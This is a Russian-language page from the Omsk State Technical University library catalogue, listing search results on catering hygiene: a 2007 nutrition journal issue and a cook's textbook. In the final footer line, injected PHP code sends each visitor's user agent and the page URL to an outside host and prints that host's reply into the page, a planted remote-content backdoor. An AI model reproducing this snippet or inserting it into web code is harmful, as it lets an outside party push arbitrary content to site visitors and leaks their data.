Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

125 пользователей


Зарегистрированных: 3 

Рассказова Анастасия Юрьевна

Рассказова Анастасия Юрьевна

Рассказова Анастасия Юрьевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 2
1. 
Вопросы питания. - Журнал, 2007г. № 2
Оглавление 
  • Профессиональная гигиеническая подготовка работников предприятий пищевой отрасли. - с.45-49
    Кл. слова: ПРОИЗВОДСТВО ПИЩЕВОЕ, ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ
  • Оценка биологической ценности и подлинности прополиса как сырья, используемого в пищевых продуктах и биологически активных добавках к пище / ; А. С. Кошечкина, А. М. Власов, К. И, Эллер, Д. Н. Коваленко. - с.53-56
  • Битуева, Э. Б. Оценка эффективности использования йодосодержащих биологически активных добавок к пище в эксперименте / Э. Б. Битуева, С. Д, Жамсаранова, Л. В. Антипова. - с.57-59
  • Шилина, Н. М. Пищевая коррекция кальциевой и йодной недостаточности у детей / Н. М. Шилина, А. Л. Поздняков. - с.63-66
    Кл. слова: ПИТАНИЕ ДЕТЕЙ
Держатели документа (Информация об экземплярах) 
2. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3019 - 15.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.56 с.14 запросов, 0.38c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;